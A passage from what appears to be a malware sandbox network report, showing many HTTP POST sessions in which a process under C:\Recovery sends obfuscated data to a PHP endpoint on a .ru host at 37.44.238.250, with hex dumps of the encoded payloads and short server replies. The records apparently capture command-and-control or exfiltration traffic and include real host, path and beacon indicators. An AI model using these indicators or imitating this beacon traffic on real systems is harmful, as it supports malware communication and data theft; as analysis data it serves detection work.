                                                                    Nov 6, 2024 03:37:50.563333988 CET1012OUTData Raw: 53 55 5a 5c 56 5d 55 5e 5a 5f 52 51 54 52 5b 5b 55 50 59 5b 51 56 52 5b 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: SUZ\V]U^Z_RQTR[[UPY[QVR[QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%;<=?>30X)91>[:%(Y 2W?49%' >2'X$.Q-
                                                                    Nov 6, 2024 03:37:51.015120983 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:51.093040943 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:49 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    37192.168.2.44977837.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:37:51.219505072 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:37:51.580080032 CET1012OUTData Raw: 56 57 5a 55 56 57 50 5a 5a 5f 52 51 54 5e 5b 5c 55 53 59 59 51 51 52 59 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VWZUVWPZZ_RQT^[\USYYQQRYQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%_,/"W+'+30Y>:6?=*]';(Z .(=#Y9?7&'X$.Q-6
                                                                    Nov 6, 2024 03:37:52.037761927 CET25INHTTP/1.1 100 Continue


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    38192.168.2.44977937.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:37:52.038177013 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1260
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:37:52.391436100 CET1260OUTData Raw: 56 5f 5a 54 53 5a 50 5b 5a 5f 52 51 54 5a 5b 5c 55 51 59 58 51 51 52 5e 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: V_ZTSZP[Z_RQTZ[\UQYXQQR^QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^&,<'(3(])*.*9$8([ ?W+=7Z,%,Y#Q&&)'X$.Q->
                                                                    Nov 6, 2024 03:37:52.848625898 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:52.922964096 CET308INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:50 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive
                                                                    Data Raw: 00 1e 23 01 28 14 29 01 24 28 28 18 28 3e 25 1d 3c 33 30 02 2c 1c 2c 58 29 0a 3f 00 2b 3b 3f 0d 20 59 34 06 35 32 35 5d 23 22 0d 13 3f 11 21 5f 05 1d 3a 02 27 5f 3c 1d 3d 1c 2d 04 29 09 23 1b 32 09 34 43 29 2b 3a 11 23 04 26 1e 25 00 3d 1f 26 54 37 1b 28 34 36 07 3a 11 2b 50 32 00 2a 57 09 16 23 09 27 23 2f 59 29 31 09 5e 24 58 29 5a 31 03 3c 0a 29 3c 0e 03 37 42 26 5c 29 0d 28 01 36 37 0c 5d 33 03 21 1b 32 00 28 09 28 22 26 55 22 0d 20 54 01 30 5d 4f
                                                                    Data Ascii: #()$(((>%<30,,X)?+;? Y4525]#"?!_:'_<=-)#24C)+:#&%=&T7(46:+P2*W#'#/Y)1^$X)Z1<)<7B&\)(67]3!2(("&U" T0]O


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    39192.168.2.44978037.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:37:52.225567102 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:37:52.578927994 CET1012OUTData Raw: 53 55 5f 5e 56 57 55 5a 5a 5f 52 51 54 5d 5b 53 55 54 59 56 51 56 52 5e 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: SU_^VWUZZ_RQT][SUTYVQVR^QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%_8?!=(<U+*!=>*_$; [#(=7[.&$_#Q:Y&9'X$.Q-
                                                                    Nov 6, 2024 03:37:53.036077976 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:53.109078884 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:51 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    40192.168.2.44978137.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:37:53.237962961 CET273OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Nov 6, 2024 03:37:53.594628096 CET1012OUTData Raw: 56 57 5f 58 56 5c 55 5e 5a 5f 52 51 54 59 5b 52 55 54 59 5d 51 5f 52 5f 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VW_XV\U^Z_RQTY[RUTY]Q_R_QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%_//?0(30]*9!^?.!$^#4?1?/X.%_ '&&9'X$.Q-*
                                                                    Nov 6, 2024 03:37:54.057194948 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:54.136538029 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:52 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    41192.168.2.44978237.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:37:54.683142900 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:37:55.032087088 CET1012OUTData Raw: 53 52 5f 5f 53 5b 55 59 5a 5f 52 51 54 5d 5b 5d 55 50 59 5b 51 50 52 5a 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: SR__S[UYZ_RQT][]UPY[QPRZQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%8?>(88?0<\(9->0(#4>T+,-772X29'X$.Q-
                                                                    Nov 6, 2024 03:37:55.518467903 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:55.587086916 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:53 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    42192.168.2.44978337.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:37:55.741463900 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:37:56.094501972 CET1012OUTData Raw: 53 55 5f 59 53 58 50 5e 5a 5f 52 51 54 5d 5b 58 55 57 59 59 51 5f 52 5e 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: SU_YSXP^Z_RQT][XUWYYQ_R^QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%\;"<;4X>#8Y(**-\$(#?"P(.]93 7*]'9'X$.Q-
                                                                    Nov 6, 2024 03:37:56.569845915 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:56.643273115 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:54 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    43192.168.2.44978537.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:37:57.352922916 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:37:57.704194069 CET1012OUTData Raw: 56 53 5f 59 53 5a 50 5f 5a 5f 52 51 54 52 5b 5c 55 51 59 5d 51 53 52 5a 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VS_YSZP_Z_RQTR[\UQY]QSRZQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^&,5<#?+*.=[='84Y"(-79&<7"&'X$.Q-


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    44192.168.2.44978637.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:37:57.944560051 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1276
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:37:58.297629118 CET1276OUTData Raw: 56 56 5f 5b 56 5a 55 59 5a 5f 52 51 54 5e 5b 53 55 52 59 5b 51 5e 52 53 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VV_[VZUYZ_RQT^[SURY[Q^RSQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^&/5?((3#=)=$8#<=#]9<_#.X1'X$.Q-6
                                                                    Nov 6, 2024 03:37:58.759608030 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:58.827132940 CET308INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:56 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive
                                                                    Data Raw: 00 1e 23 06 3f 3a 32 13 26 3b 24 18 29 3e 31 5f 2b 33 33 16 2c 31 27 02 29 1d 28 1e 29 28 3c 19 37 01 33 1a 23 22 03 5b 20 32 3b 5e 3c 01 21 5f 05 1d 39 11 33 07 3c 55 2a 22 0b 06 3e 34 3c 40 25 09 24 08 29 15 26 5d 20 3a 26 52 26 3e 3a 03 31 1c 33 1b 3f 1d 26 03 2d 3c 3f 1f 31 10 2a 57 09 16 20 50 30 23 3f 5e 3d 0f 33 5e 24 58 35 13 32 3a 0d 55 3f 3c 01 10 34 34 2d 01 2b 23 2c 07 23 27 0f 02 33 39 26 43 31 00 05 57 2b 18 26 55 22 0d 20 54 01 30 5d 4f
                                                                    Data Ascii: #?:2&;$)>1_+33,1')()(<73#"[ 2;^<!_93<U*">4<@%$)&] :&R&>:13?&-<?1*W P0#?^=3^$X52:U?<44-+#,#'39&C1W+&U" T0]O


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    45192.168.2.44978737.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:37:58.065220118 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:37:58.422774076 CET1012OUTData Raw: 56 56 5a 58 56 57 55 5f 5a 5f 52 51 54 5e 5b 52 55 5c 59 5b 51 52 52 5b 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VVZXVWU_Z_RQT^[RU\Y[QRR[QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%Y,/.V?;8X>3$=91="^'^8Z7/(X?:%$^#7-&'X$.Q-6
                                                                    Nov 6, 2024 03:37:58.876014948 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:58.951745987 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:56 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    46192.168.2.44978937.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:37:59.087606907 CET273OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Nov 6, 2024 03:37:59.438267946 CET1012OUTData Raw: 56 55 5a 59 56 5b 50 5d 5a 5f 52 51 54 53 5b 5e 55 51 59 5a 51 56 52 5b 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VUZYV[P]Z_RQTS[^UQYZQVR[QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%/?&S+4?8Y>!Z>-9'?#.(.(-%( $:%'X$.Q-
                                                                    Nov 6, 2024 03:37:59.899265051 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:37:59.976402998 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:57 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    47192.168.2.44979037.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:38:00.340729952 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:00.688280106 CET1012OUTData Raw: 56 55 5f 5e 56 59 50 59 5a 5f 52 51 54 5c 5b 52 55 55 59 58 51 57 52 5e 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VU_^VYPYZ_RQT\[RUUYXQWR^QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%Y/??X<3 X(:)[$^87?)(>#.5 %)'X$.Q->
                                                                    Nov 6, 2024 03:38:01.167135000 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:01.246028900 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:37:59 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    48192.168.2.44979637.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:38:01.411005020 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:01.766426086 CET1012OUTData Raw: 53 52 5a 5b 56 5b 50 5d 5a 5f 52 51 54 5f 5b 59 55 53 59 5e 51 54 52 5e 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: SRZ[V[P]Z_RQT_[YUSY^QTR^QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^&/?6T+8X<#=*%?-*04"/.U<Y-5+#]%'X$.Q-2
                                                                    Nov 6, 2024 03:38:02.220505953 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:02.300837994 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:00 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    49192.168.2.44980237.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:38:02.599716902 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1008
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:02.959175110 CET1008OUTData Raw: 56 5f 5f 58 56 56 50 58 5a 5f 52 51 54 5a 5b 59 55 54 59 5e 51 50 52 59 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: V__XVVPXZ_RQTZ[YUTY^QPRYQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%8<)<;(]> ;*:=_?.>]0; 4Q?0.5,7"%'X$.Q-*
                                                                    Nov 6, 2024 03:38:03.401977062 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:03.480639935 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:01 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    50192.168.2.44980837.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:38:03.721577883 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
